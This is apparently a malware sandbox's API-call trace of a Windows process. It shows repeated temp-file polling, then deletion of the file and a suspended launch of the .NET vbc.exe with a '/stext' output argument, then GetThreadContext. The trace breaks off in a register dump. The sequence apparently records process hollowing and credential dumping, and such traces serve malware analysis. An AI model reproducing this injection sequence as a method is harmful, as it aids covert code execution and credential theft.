CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3b8 [0130.045] GetLastError () returned 0x0 [0130.045] GetFileType (hFile=0x3b8) returned 0x1 [0130.045] SetErrorMode (uMode=0x0) returned 0x1 [0130.045] GetFileType (hFile=0x3b8) returned 0x1 [0130.045] ReadFile (in: hFile=0x3b8, lpBuffer=0x33a5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x33a5d50*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0130.045] GetLastError () returned 0x0 [0130.045] ReadFile (in: hFile=0x3b8, lpBuffer=0x33a5d50, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x33a5d50*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0130.045] GetLastError () returned 0x0 [0130.046] CloseHandle (hObject=0x3b8) returned 1 [0130.046] GetLastError () returned 0x0 [0131.048] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0131.048] GetLastError () returned 0x0 [0131.048] SetErrorMode (uMode=0x1) returned 0x0 [0131.048] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3b8 [0131.048] GetLastError () returned 0x0 [0131.048] GetFileType (hFile=0x3b8) returned 0x1 [0131.048] SetErrorMode (uMode=0x0) returned 0x1 [0131.048] GetFileType (hFile=0x3b8) returned 0x1 [0131.048] ReadFile (in: hFile=0x3b8, lpBuffer=0x33a80b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x33a80b0*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0131.048] GetLastError () returned 0x0 [0131.048] ReadFile (in: hFile=0x3b8, lpBuffer=0x33a80b0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x33a80b0*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0131.048] GetLastError () returned 0x0 [0131.048] CloseHandle (hObject=0x3b8) returned 1 [0131.049] GetLastError () returned 0x0 [0132.063] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0132.063] GetLastError () returned 0x0 [0132.063] SetErrorMode (uMode=0x1) returned 0x0 [0132.063] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3b8 [0132.063] GetLastError () returned 0x0 [0132.063] GetFileType (hFile=0x3b8) returned 0x1 [0132.064] SetErrorMode (uMode=0x0) returned 0x1 [0132.064] GetFileType (hFile=0x3b8) returned 0x1 [0132.064] ReadFile (in: hFile=0x3b8, lpBuffer=0x33aa410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x33aa410*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0132.064] GetLastError () returned 0x0 [0132.064] ReadFile (in: hFile=0x3b8, lpBuffer=0x33aa410, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x33aa410*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0132.064] GetLastError () returned 0x0 [0132.064] CloseHandle (hObject=0x3b8) returned 1 [0132.065] GetLastError () returned 0x0 [0133.079] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0133.079] GetLastError () returned 0x0 [0133.079] SetErrorMode (uMode=0x1) returned 0x0 [0133.079] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3b8 [0133.079] GetLastError () returned 0x0 [0133.079] GetFileType (hFile=0x3b8) returned 0x1 [0133.079] SetErrorMode (uMode=0x0) returned 0x1 [0133.079] GetFileType (hFile=0x3b8) returned 0x1 [0133.079] ReadFile (in: hFile=0x3b8, lpBuffer=0x33ac770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x33ac770*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0133.080] GetLastError () returned 0x0 [0133.080] ReadFile (in: hFile=0x3b8, lpBuffer=0x33ac770, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x33ac770*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0133.080] GetLastError () returned 0x0 [0133.080] CloseHandle (hObject=0x3b8) returned 1 [0133.080] GetLastError () returned 0x0 [0134.094] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0134.094] GetLastError () returned 0x0 [0134.094] SetErrorMode (uMode=0x1) returned 0x0 [0134.094] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3b8 [0134.095] GetLastError () returned 0x0 [0134.095] GetFileType (hFile=0x3b8) returned 0x1 [0134.095] SetErrorMode (uMode=0x0) returned 0x1 [0134.095] GetFileType (hFile=0x3b8) returned 0x1 [0134.095] ReadFile (in: hFile=0x3b8, lpBuffer=0x33aead0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x33aead0*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0134.095] GetLastError () returned 0x0 [0134.095] ReadFile (in: hFile=0x3b8, lpBuffer=0x33aead0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x33aead0*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0134.096] GetLastError () returned 0x0 [0134.096] CloseHandle (hObject=0x3b8) returned 1 [0134.096] GetLastError () returned 0x0 [0135.110] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0135.110] GetLastError () returned 0x0 [0135.110] SetErrorMode (uMode=0x1) returned 0x0 [0135.110] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3b8 [0135.110] GetLastError () returned 0x0 [0135.110] GetFileType (hFile=0x3b8) returned 0x1 [0135.111] SetErrorMode (uMode=0x0) returned 0x1 [0135.111] GetFileType (hFile=0x3b8) returned 0x1 [0135.111] ReadFile (in: hFile=0x3b8, lpBuffer=0x33b0e30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x33b0e30*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0135.111] GetLastError () returned 0x0 [0135.111] ReadFile (in: hFile=0x3b8, lpBuffer=0x33b0e30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x33b0e30*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0135.111] GetLastError () returned 0x0 [0135.111] CloseHandle (hObject=0x3b8) returned 1 [0135.111] GetLastError () returned 0x0 [0136.112] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0136.112] GetLastError () returned 0x0 [0136.112] SetErrorMode (uMode=0x1) returned 0x0 [0136.112] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3b8 [0136.112] GetLastError () returned 0x0 [0136.112] GetFileType (hFile=0x3b8) returned 0x1 [0136.112] SetErrorMode (uMode=0x0) returned 0x1 [0136.112] GetFileType (hFile=0x3b8) returned 0x1 [0136.112] ReadFile (in: hFile=0x3b8, lpBuffer=0x33b3190, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x33b3190*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0136.113] GetLastError () returned 0x0 [0136.113] ReadFile (in: hFile=0x3b8, lpBuffer=0x33b3190, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x33b3190*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0136.113] GetLastError () returned 0x0 [0136.113] CloseHandle (hObject=0x3b8) returned 1 [0136.113] GetLastError () returned 0x0 [0137.124] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2e9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0137.124] GetLastError () returned 0x0 [0137.124] SetErrorMode (uMode=0x1) returned 0x0 [0137.124] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3b8 [0137.125] GetLastError () returned 0x0 [0137.125] GetFileType (hFile=0x3b8) returned 0x1 [0137.125] SetErrorMode (uMode=0x0) returned 0x1 [0137.125] GetFileType (hFile=0x3b8) returned 0x1 [0137.125] ReadFile (in: hFile=0x3b8, lpBuffer=0x33b54f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x33b54f0*, lpNumberOfBytesRead=0xf2ef28*=0x2, lpOverlapped=0x0) returned 1 [0137.125] GetLastError () returned 0x0 [0137.125] ReadFile (in: hFile=0x3b8, lpBuffer=0x33b54f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xf2ef28, lpOverlapped=0x0 | out: lpBuffer=0x33b54f0*, lpNumberOfBytesRead=0xf2ef28*=0x0, lpOverlapped=0x0) returned 1 [0137.125] GetLastError () returned 0x0 [0137.125] CloseHandle (hObject=0x3b8) returned 1 [0137.126] GetLastError () returned 0x0 [0138.140] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2eb10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0138.140] GetLastError () returned 0x0 [0138.140] SetErrorMode (uMode=0x1) returned 0x0 [0138.140] GetFileAttributesExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp"), fInfoLevelId=0x0, lpFileInformation=0xf2ef90 | out: lpFileInformation=0xf2ef90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe8d7cd9e, ftCreationTime.dwHighDateTime=0x1d4653e, ftLastAccessTime.dwLowDateTime=0xe8d7cd9e, ftLastAccessTime.dwHighDateTime=0x1d4653e, ftLastWriteTime.dwLowDateTime=0xea9e79d7, ftLastWriteTime.dwHighDateTime=0x1d4653e, nFileSizeHigh=0x0, nFileSizeLow=0x2)) returned 1 [0138.141] GetLastError () returned 0x0 [0138.141] SetErrorMode (uMode=0x0) returned 0x1 [0138.141] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", nBufferLength=0x105, lpBuffer=0xf2eb1c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp", lpFilePart=0x0) returned 0x34 [0138.141] GetLastError () returned 0x0 [0138.144] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp3B59.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp3b59.tmp")) returned 1 [0138.145] GetLastError () returned 0x0 [0138.147] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x1271d60 | out: lpBuffer="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\") returned 0x25 [0138.147] GetLongPathNameW (in: lpszShortPath="C:\\Users\\CIIHMN~1\\", lpszLongPath=0xf2eaec, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\CIiHmnxMn6Ps\\") returned 0x16 [0138.148] GetLastError () returned 0x0 [0138.148] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\", nBufferLength=0x105, lpBuffer=0xf2eb14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x29 [0138.148] GetLastError () returned 0x0 [0138.148] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\", nBufferLength=0x105, lpBuffer=0xf2eab4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x29 [0138.148] GetLastError () returned 0x0 [0138.148] GetTempFileNameW (in: lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\", lpPrefixString="tmp", uUnique=0x0, lpTempFileName=0x1271d60 | out: lpTempFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp53A0.tmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\temp\\tmp53a0.tmp")) returned 0x53a0 [0138.148] GetLastError () returned 0x0 [0138.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xf2ea90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0138.149] GetLastError () returned 0x3f0 [0138.149] CreateProcessW (in: lpApplicationName="C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe", lpCommandLine="\"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe\" /stext \"C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp53A0.tmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x1271d60*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xf2ef20 | out: lpCommandLine="\"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\vbc.exe\" /stext \"C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Temp\\tmp53A0.tmp\"", lpProcessInformation=0xf2ef20*(hProcess=0x3b4, hThread=0x3b8, dwProcessId=0xe1c, dwThreadId=0x190)) returned 1 [0138.155] GetThreadContext (in: hThread=0x3b8, lpContext=0x33b7d58 | out: lpContext=0x33b7d58*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x7ffde000, Edx=0x0, Ecx=0x0, Eax=0x4748a2, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, 